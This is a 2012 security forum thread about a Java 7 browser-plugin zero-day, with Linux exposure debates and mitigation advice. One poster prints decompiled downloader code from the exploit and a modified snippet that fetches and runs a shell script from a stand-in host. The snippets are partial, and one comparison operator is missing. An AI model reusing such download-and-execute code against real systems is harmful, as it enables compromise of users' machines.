dslreports logo
site
 
    All Forums Hot Topics Gallery
spc

spacer




how-to block ads


Search Topic:
uniqs
2904
share rss forum feed


KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

Java 7 0-day

The newly discovered Java 7 0-day works on Linux (at least on the default install of Ubuntu 12.04). Tested it earlier with a VM and Metasploit. It works on both Firefox and Chromium (it bypasses the Chromium chroot sandbox, though I am not sure if Chromium sandboxes Java in the first place). However, I don't *think* it works with OpenJDK. At any rate, if you are using Oracle's official Java 7 in your browser, you can be compromised by merely visiting a malicious page (no user interaction required). Luckily, at least for Ubuntu users, Oracle's Java is not in the repos. You must install from a PPA.

I also tested it against the AppArmor profile that comes with Ubuntu and AppArmor killed it cold, so I highly recommend using AppArmor, SELinux or Grsec on a desktop box, at least for the browser. Unfortunately, Ubuntu no longer comes with the AppArmor profile enabled by default, so you have to do it yourself (and make a few tweaks to the profile).

And NX/ASLR/RELRO does not stop it since it doesn't work via memory corruption. It works on both 32 and 64 bit as well.

Since it may be a while before this is patched by Oracle, I thought I would give a heads up, especially since it is already in Metasploit. Obviously this means the script-kiddies will be running wild with it in no time.

The exploit doesn't get root, but that's not needed to connect to a remote server without one's knowledge.

It also affects Mac and Windows users too, of course.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They dont want to change; they are happy with slowly dying inside. -- munky99999



JohnInSJ
Premium
join:2003-09-22
Aptos, CA

I've not seen a good description of what this does give you - access at the current user level for the login session that's running? What about firewalls?
--
My place : »www.schettino.us



timcuth
Braves Fan
Premium
join:2000-09-18
Pelham, AL
Reviews:
·Charter
·AT&T Southeast
reply to KodiacZiller

Is there a way to prevent Java from executing without completely uninstalling it?

Is it just Java programming language, or Javascript, too? If in includes Javascript, it will break most web pages.

What are the current (as of right now, for this exploit) best practices for protection?
--
"Life is like this long line, except at the end there ain't no merry-go-round." - Arthur on The King of Queens
~ Project Hope ~



KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

said by timcuth:

Is there a way to prevent Java from executing without completely uninstalling it?

Not really unless you disable the plugin in the browser. Or you can, as I said above, use a MAC system like AppArmor or SELinux. Java 6 is not affected so that might be an option.

Is it just Java programming language, or Javascript, too? If in includes Javascript, it will break most web pages.

AFAIK it is just Java.

What are the current (as of right now, for this exploit) best practices for protection?

Either disable Java in the browser or confine it with a MAC.

Of course, the chances of Linux being targeted are small, but still possible.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They dont want to change; they are happy with slowly dying inside. -- munky99999


timcuth
Braves Fan
Premium
join:2000-09-18
Pelham, AL
Reviews:
·Charter
·AT&T Southeast

said by KodiacZiller:

Of course, the chances of Linux being targeted are small, but still possible.

Thanks for your answers.

Java is cross-platform, so I doubt it will make any difference to the exploit what host system is running.

Tim
--
"Life is like this long line, except at the end there ain't no merry-go-round." - Arthur on The King of Queens
~ Project Hope ~


Maxo
Your tax dollars at work.
Premium,VIP
join:2002-11-04
Tallahassee, FL
reply to timcuth

said by timcuth:

Is it just Java programming language, or Javascript, too? If in includes Javascript, it will break most web pages.

Java and JavaScript are common in name only.


howardfine

join:2002-08-09
Saint Louis, MO
reply to KodiacZiller

»www.theregister.co.uk/2012/08/27···exploit/

quote:
In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.

Which means no method has been found that involves Linux or Mac.


KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

1 edit

said by howardfine:

»www.theregister.co.uk/2012/08/27···exploit/

quote:
In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.

Which means no method has been found that involves Linux or Mac.

Yeah, from my testing, the Metasploit exploit downloads a .exe to /tmp and then tries to execute it. Obviously a .exe won't run on a *nix box, but as the article points out, it would be trivial to change the payload to something *nix specific (like a shell script for instance).

You could always mount /tmp noexec, but that requires /tmp to be on its own partition. Also doing this will break a lot of apps.

The best option is to use Java 6, disable Java all together in the browser, or lock the browser down with a MAC system.

EDIT: Also it appears OpenJDK (Iced Tea) is not affected, so most Linux users are probably safe since most don't use Oracle's official Java anyway. Ubuntu took Oracle's Java out of its repositories a while back and now OpenJDK is what is installed.

--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They dont want to change; they are happy with slowly dying inside. -- munky99999


BBBanditRuR
Dingbits

join:2009-06-02
Parachute, CO
Reviews:
·Comcast

said by KodiacZiller :

Obviously a .exe won't run on a *nix box

EEEEK! Halten Sie!

»www.winehq.org/

... the effects of which...

are unknown...


howardfine

join:2002-08-09
Saint Louis, MO
reply to KodiacZiller

said by KodiacZiller:

it would be trivial to change the payload to something *nix specific (like a shell script for instance).

But how would that be executed without permissions?

@BBBanditRuR - Same answer. That was created with the Windows ABI and can't run on a *nix machine no matter how hard one tries.


JohnInSJ
Premium
join:2003-09-22
Aptos, CA
reply to KodiacZiller

said by KodiacZiller:

said by howardfine:

»www.theregister.co.uk/2012/08/27···exploit/

quote:
In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.

Which means no method has been found that involves Linux or Mac.

Yeah, from my testing, the Metasploit exploit downloads a .exe to /tmp and then tries to execute it.

Which would run as the current user, even under windows - which should (if the user isn't running as Admin, or hasn't disabled UAC) raise all sorts of alarms if it does something needing permissions.
--
My place : »www.schettino.us


BBBanditRuR
Dingbits

join:2009-06-02
Parachute, CO
reply to howardfine

My point is that while it may not affect the running system, malicious software *could* run on it.



FF4m3

@bhn.net
reply to KodiacZiller

Years ago I found it possible to eliminate Java from all my used OSes by switching to apps that don't reqire Java. So all related issues became forever nonexistent.

Naturally not everyone is able to do this but, if possible, it offers a permanent solution.



Maxo
Your tax dollars at work.
Premium,VIP
join:2002-11-04
Tallahassee, FL

said by FF4m3 :

Naturally not everyone is able to do this but, if possible, it offers a permanent solution.

I've been to get rid of Sun Java on all but my work machine. I use SQL Developer for my database work. It runs horribly slow under OpenJDK/IcedTea.


InTheKnow

@pnap.net
reply to howardfine

Here is a snippet from the actual exploit code, those who are saying it fails to run on Linux are talking out their ass. It has Windows detection and calls chmod on a non-windows box. The xiaomaolv parameter defines the first-stage payload and could point to a shell script, a elf binary, etc. Folks, we run stuff in user-space; when your local user is owned, and it's the primary user you use to interface with the system, tell me again how this isn't a security concern?

I'd prefer someone not snarf my ~/

           if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748)
            {
                Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString();
                downFile((String)localObject1, xiaomaolv);
                if(str1.indexOf("Windows")  0)
                    exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString());
                exec((String)localObject1);
                (new File((String)localObject1)).delete();
            }
 

Of course we could keep saying it doesn't work right?

»www.youtube.com/watch?v=Ri_Uny-ZwYk


howardfine

join:2002-08-09
Saint Louis, MO

said by InTheKnow :

Here is a snippet from the actual exploit code, those who are saying it fails to run on Linux are talking out their ass.

Well the article says it only has a Windows executable in it. There is another article around that says the same thing. I don't have time to mess with your code but how you are getting a Windows executable to run in Linux without permissions would be...unusual...to put it mildly. Not to mention doing so as non-root.

EDIT: I missed you are talking about running a script and not the executable from the malware but the same question comes about. You are saying you are able to download and execute this script as a non-root user which is highly questionable.


JohnInSJ
Premium
join:2003-09-22
Aptos, CA

I think he's saying he can download a script, chmod +x it, and run it as the current user. Which isn't exactly owning the box just yet. Next would be that the payload would execute a local root elevation (assuming you're not patched against the script kiddie list of exploits attempted in the payload)

So to recap you must be
1) dumb enough to run java in your browser (hey, it's 1998!)
2) running as root (OMG, like totally) or
3) running a system with known root elevation exploits or
4) l33t haxxors have you.

That seems to be right to me.

I think most linux users are going to be failing at 1. I think anyone with a brain should be failing at 1.
--
My place : »www.schettino.us



InTheKnow

@pnap.net
reply to howardfine

Respectfully, yes you can run the script as a non-root user, programmatically, just as any local user can, or a binary.

Two lines of code and it can be made cross platform. I think folks are confusing the necessity of root access to "own" the system. I think we're arguing semantics here; unauthorized execution of code, even in the context of a local unprivileged user, is still "owning". If anything, owning the system as the local logged in user gives them access to the encrypted data stores typically unencrypted during login like ecryptfs/luks.

Consider the below code, wee, look it's cross-platform:

       if(xiaomaolv == null && bn == null)
            return null;
        try
        {
            String k1 = "woyouyizhixiaomaol";
            String k2 = "conglaiyebuqi";
            String str1 = System.getProperty("os.name");
            if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748)
            {
                Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString();
                downFile((String)localObject1, xiaomaolv);
                if(str1.indexOf("Windows")  0){
		    //Wee look at me, I affect not just Windows!!
		    (new File((String)localObject1)).delete();
                    downFile((String)localObject1, "http://www.example.com/hostile_stuff.sh");
                    exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString());
 
		}
                exec((String)localObject1);
                (new File((String)localObject1)).delete();
            }
        }
        catch(Exception exception) { }
        return null;
 

These are just code snippets, I'm not going to post the whole decompiled jar/class files. Let me say the assertions of:

1) People shouldn't run Java -- I'm sorry, this is assinine. Java is security horrid but there are enterprise applications that explicitly require it such as Juniper's VPN client on Linux. QuickJava is a pretty good answer for a Firefox plugin.

2) Running as root; yeah they should be flogged.

3-4) A simple wget script, running in a loop, backgrounded, makes a pretty damned good resource exhaustion attack for a bot-peer. C'mon guys, we see this crap already with the SSH scans and ownage of various unpatched web-apps on LAMP boxes. Connect-back shells, complex bot-peer Perl code, stripped ELFs, etc. You don't need root to bind an unpriv socket.

Lets not be too dismissive of reality. As of now, even for Linux folks, it seems 1.6.0_u34 is the best answer or even better is OpenJDK IF it works with the enterprise applications.

I'm half tempted to setup POC that fork-bombs folks who haven't setup limits.conf for nproc just as a POC to demonstrate that indeed Virginia, there is a security concern here.


Maxo
Your tax dollars at work.
Premium,VIP
join:2002-11-04
Tallahassee, FL
reply to KodiacZiller

For those who may not know, I think it is important does not work by just having Java on your system. It must also be a browser plugin. You can install Java without giving your browser access to run it as a plug in.



Snakeoil
Ignore Button. The coward's feature.
Premium
join:2000-08-05
Mentor, OH
kudos:1
reply to KodiacZiller

How does it work with Minecraft?



howardfine

join:2002-08-09
Saint Louis, MO
reply to InTheKnow

Well I know what you're getting at, and I agree with your points, but yes I am glossing over things.



InTheKnow

@pnap.net

No worries, this is the real deal. Linux may not be a highly targeted demographic but indeed, we are vulnerable here if using the unpatched Oracle/Sun Java 1.7.x branch and it's able to be instanced, either from a browser, or other methods. Does this mean GNU/Linux itself is on the same security plane as Windows? Hell no, it just means we've got another permutation of typical asshattery from Oracle on par with Adobe; sometimes I think they're in competition to see who can produce the most security lax, shitty, exploitable code that causes tangible dollar loss in financial fraud thanks to Blackhole/Phoenix/Redkit Exploit Kit deployments of ZeuS, Carberp, Bugats, Gozi, SpyEye, etc.

Is the sky falling? No, we're GNU/Linux folks, we're a little more aware and technical than the Win32 sheeple who still believe signature-based anti-virus is something more than security placebo. "Protection from yesterday by tomorrow".

We just need to paint a picture of accuracy here. Not targeted by 1st stage downloaders/successful exploitation payload doesn't mean we're not vulnerable and *can't* be targeted. Trivial changes to the exploitation code seen in the wild can target all three demographics AND there is a real risk of compromise even if the process is constrained to the local logged-on user.

Lets just relish in the fact we can constrain processes using AppArmor, chrooting, etc and not have to rely on profiteering security vendors to convince us that by running their product it's "All the protection we'll ever need!"



JohnInSJ
Premium
join:2003-09-22
Aptos, CA
reply to InTheKnow

said by InTheKnow :

1) People shouldn't run Java

In a browser that blindly executes any jar file it finds. NoScript would stop this. So would not having Java installed in the browser you use when browsing porn sites, er, sites that may be exploited.
--
My place : »www.schettino.us


Ian
Premium
join:2002-06-18
ON
kudos:3

said by JohnInSJ:

said by InTheKnow :

1) People shouldn't run Java

In a browser that blindly executes any jar file it finds. NoScript would stop this. So would not having Java installed in the browser you use when browsing porn sites, er, sites that may be exploited.

I think with Firefox all you have to do running noscript or not is to change in about:config plugins.click_to_play = true. Then you can decide which (if any) to activate.

Is it normal that it would take this long to issue a patch?
--
“Any claim that the root of a problem is simple should be treated the same as a claim that the root of a problem is Bigfoot. Simplicity and Bigfoot are found in the real world with about the same frequency.” – David Wong


Maxo
Your tax dollars at work.
Premium,VIP
join:2002-11-04
Tallahassee, FL
reply to Snakeoil

said by Snakeoil:

How does it work with Minecraft?

I'm running both the Minecraft server and client with OpenJDK 7 to great avail.


KodiacZiller
Premium
join:2008-09-04
73368
kudos:2

1 edit
reply to JohnInSJ

I had a post typed and lost it.

Anyway, I was just going to reiterate what InTheKnow is saying. You don't need root to do some malicious things on a *nix box. The infamous malware for OSX that made headlines a couple months ago didn't get root on Mac's either. It was almost identical to this -- it used a Java exploit in the browser and took over userspace.

Fortunately we already have tools in Linux to make such attacks much more difficult. MAC systems (AppArmor, SELinux, Grsec) for instance. Linux, just like OSX, Solaris, and BSD, uses the traditional Unix DAC model. DAC is fine for separating userspace and root, but it does nothing to control processes *within* user space. This is where MAC's come in -- they can confine user space processes from each other and can even confine the root account (so even if an attacker successfully exploits a root owned process, he can't own the whole box).

I think MAC systems will become more necessary in the future, especially for servers. Actually, it is wise to use them now for servers. Even for desktops, it is smart to use them, at least for the browser. I find AppArmor the simplest to use, so it is my choice. Grsecurity is probably the best, but it is an animal to setup and get tweaked properly.



howardfine

join:2002-08-09
Saint Louis, MO

said by KodiacZiller:

You don't need root to do some malicious things on a *nix box. The infamous malware for OSX that made headlines a couple months ago didn't get root on Mac's either. It was almost identical to this -- it used a Java exploit in the browser and took over userspace.

I'm not sure it's the same as this but I think I recall that being more malarky and sky is falling than anything real.

I don't know. I get back from working on the Olympics stuff and now I've got a big project kicking off Monday. I don't remember anything anymore.


JohnInSJ
Premium
join:2003-09-22
Aptos, CA
reply to KodiacZiller

said by KodiacZiller:

Anyway, I was just going to reiterate what InTheKnow is saying. You don't need root to do some malicious things on a *nix box.

Userspace problems are easier to clean up. Far, far easier.
--
My place : »www.schettino.us


InTheKnow

@pnap.net
reply to howardfine

said by howardfine:

said by KodiacZiller:

You don't need root to do some malicious things on a *nix box. The infamous malware for OSX that made headlines a couple months ago didn't get root on Mac's either. It was almost identical to this -- it used a Java exploit in the browser and took over userspace.

I'm not sure it's the same as this but I think I recall that being more malarky and sky is falling than anything real.

This was dubbed Flashback, and I assure you it was both real and absolutely affected OS X. Were there alarmist news reports on it; no. Was there tangible, measurable, observed infection on a large volume of OS X computers that were seen across multiple industries with specific markers? Absolutely, and I'm speaking authoritatively (PCAPs) here not regurgitating news articles.

said by JohnInSJ:

Userspace problems are easier to clean up. Far, far easier.

If you're aware of them. Gone are the days of severity of threat from 13 year old Filipinos releasing ILoveYou.vbs; sure there are some very clear differences between the Win32 and GNU/Linux security models but please don't be so dismissive of the ease of dropping MiTB fun when I'm looking at ~/.mozilla/.

IF (big IF here, I know your views on Java) you a using vulnerable version of Java instanced, and it dropped a connect-back shell or egress script, how would you know it? How would you know you're doing RFC-violating DNS C2? What about egress C&C check-in over TCP 80/443? You using an explicit proxy, not transparent, with forced auth? You running DNS C2 monitoring code? Tell me about your IDS/NIDS/HIDS setup; OSSEC-HIDS using inotify() watching your filesystem? Where's your egress network tap/span port? Where are you terminating your SSL connections so you can inspect them in the clear. What alerts do you have on self-signed certs? It's easy to say "Userspace is easy cleanup" when you're aware. Tell me about your strict egress firewall; are you using IPv6? If not, are you sure you're not using a fe80 link-local address? 99% of the time the victims of financial fraud aren't aware.

I'm not trying to dismiss your response, matter of fact if anything it highlights that GNU/Linux uses are far more aware of defense-in-depth and intelligent mitigation techniques than our Win32 counterparts, but, as evidenced by others in this thread (whom I also appreciate their thoughts), reality isn't as cut and dry as SOHO or home setups.

KodiacZiller, thanks for backing me up sir.


Snakeoil
Ignore Button. The coward's feature.
Premium
join:2000-08-05
Mentor, OH
kudos:1
reply to Maxo

Thank you. For what ever reason, we keep getting Java errors on our server [I'm running the server on a Windows box, I play on a linux box. The other 3 people that play on the server play on windows boxes].

I guess I'll have to wait for Technic to update their server package. Though I'll tell the kids to grab the new java update as well.
--
Is a person a failure for doing nothing? Or is he a failure for trying, and not succeeding at what he is attempting to do? What did you fail at today?.